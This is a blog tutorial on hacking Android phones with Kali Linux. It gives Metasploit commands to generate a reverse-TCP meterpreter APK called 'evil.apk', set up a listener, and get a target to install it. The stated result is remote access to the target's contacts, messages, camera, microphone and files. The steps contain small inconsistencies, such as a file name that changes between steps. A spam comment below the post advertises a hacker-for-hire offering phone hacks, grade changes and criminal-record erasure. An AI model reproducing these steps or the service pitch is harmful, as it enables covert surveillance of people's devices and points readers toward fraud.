Friday 8 April 2016

How To Hack Any Android Device Using Kali Linux


There are,in fact, no user-friendly softwares out there that can simply hack any Android device on the go and retrieve the desired information. So, in order to achieve this we are going to take the coding way(though there is not much code), and we are going to use Linux operating system, Kali Linux and Ubuntu are recommended ones.

what actually are we doing :

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.
what will you need :

1) A PC or Laptop running on Linux Operating System. If you are on windows or mac, you can do this on Oracle VM VirtualBox. Download it from here.
2) Active Internet Connection.
3) An Android device to test the hack. That's it!
what one can do with this hack : 
By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.
  • Get contacts (and all theirs informations)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Get all messages
  • Streaming video (for activity based client only)
  • Access file manager and many more...
The Main Procedure : When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)
Step 1 : Open the terminal in Linux , type the below code and press enter.
:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > andro.apk


Step 2 : Now the deploy application evil.apk will be automatically generated. You can find it in home folder.
Step 3 : Now open another terminal and type the below code.
> msfconsole

It takes sometime for metasploit to download and load its contents. So be patient!
Step 4 : When metasploit successfully loaded type the below code.
> use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.45.4 (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
> exploit

Step 5 : Now all you need to do is, copy the evil.apk from home folder to the target device.
Step 6 : Install the evil.apk on the target device and when the device is connected to the internet open the app.
Step 7 : As soon as you open the app in the device, you can see the connected device in console terminal.




If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).

Now the console starts listening to 192.168.45.4 at port 8080.

Step 8 : Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.

Congrats! you have successfully hacked an android device... Enjoy!!! :)
 

1 comment:

  1. This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change
    -funds recovery

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete